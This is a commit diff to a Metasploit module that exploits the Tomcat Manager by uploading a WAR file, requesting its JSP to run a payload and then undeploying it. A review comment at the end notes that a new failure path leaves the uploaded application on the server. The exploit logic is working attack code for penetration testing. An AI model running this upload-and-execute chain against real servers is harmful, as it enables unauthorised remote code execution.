Do easy cleanup of exploit

bug/bundler_fix
jvazquez-r7 2014-01-30 14:42:02 -06:00
parent c336133a8e
commit cebbe71dba
1 changed files with 30 additions and 35 deletions


@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
mytarget = target
if (target.name =~ /Automatic/)
if target.name =~ /Automatic/
mytarget = auto_target
unless mytarget
fail_with(Failure::NoTarget, "Unable to automatically select a target")
@ -184,14 +184,14 @@ class Metasploit3 < Msf::Exploit::Remote
:platform => mytarget.platform
}).to_s
#find CSRF Token
# find CSRF Token
res = query_manager
return nil unless res and res.code == 200
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") unless res and res.code == 200
session_id = res.get_cookies()
session_id = res.get_cookies
csrf_token = find_csrf(res)
if(csrf_token==nil)
if csrf_token.nil?
query_str = ""
else
query_str = "?path=/"
@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote
path_tmp = normalize_uri(target_uri.path.to_s, "html", "upload") + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
boundary_identifier=rand_text_numeric(28)
boundary_identifier = rand_text_numeric(28)
warmultipart = "-----------------------------"
warmultipart << boundary_identifier
@ -225,15 +225,12 @@ class Metasploit3 < Msf::Exploit::Remote
'password' => datastore['PASSWORD'],
'cookie' => session_id,
'data' => warmultipart,
}, 20)
if (! res)
fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [No Response]")
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
})
fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [No Response]") unless res
if res.code < 200 or res.code >= 300
print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
end
@ -250,25 +247,25 @@ class Metasploit3 < Msf::Exploit::Remote
#
# EXECUTE
#
jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
jsp_path = normalize_uri(app_base, "#{jsp_name}.jsp")
print_status("Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
}, 20)
})
if (! res)
print_error("Execution failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
vprint_status(res.body)
end
#Get the new CSRF token & session id
res = query_manager
return nil unless res and res.code == 200
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") unless res and res.code == 200
session_id = res.get_cookies()
session_id = res.get_cookies
csrf_token = find_csrf(res)
if(csrf_token==nil)
@ -289,14 +286,12 @@ class Metasploit3 < Msf::Exploit::Remote
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => session_id
}, 20)
if (! res)
print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]")
elsif (res.code < 200 or res.code >= 300)
})
print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
end
handler
end
def query_status
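Review bot: The second `fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")`, the one after the `#Get the new CSRF token & session id` comment, runs after the JSP has already been requested, so raising there skips both the undeploy request and `handler` while the uploaded `#{app_base}.war` stays deployed on the server under test. The operator then sees only a generic access failure, with nothing saying that an application was left behind and has to be removed. At that point I would emit `print_warning("Unable to access the Tomcat Manager; #{app_base} was not undeployed and must be removed manually")`, then call `handler` and return, keeping `fail_with` for the pre-upload check only. The parts of `exploit` between the hunks are not visible here, so this presumes no other code undeploys the application on that path. Separately, `if(csrf_token==nil)` right below that line was left in the old style, while the first occurrence became `if csrf_token.nil?`.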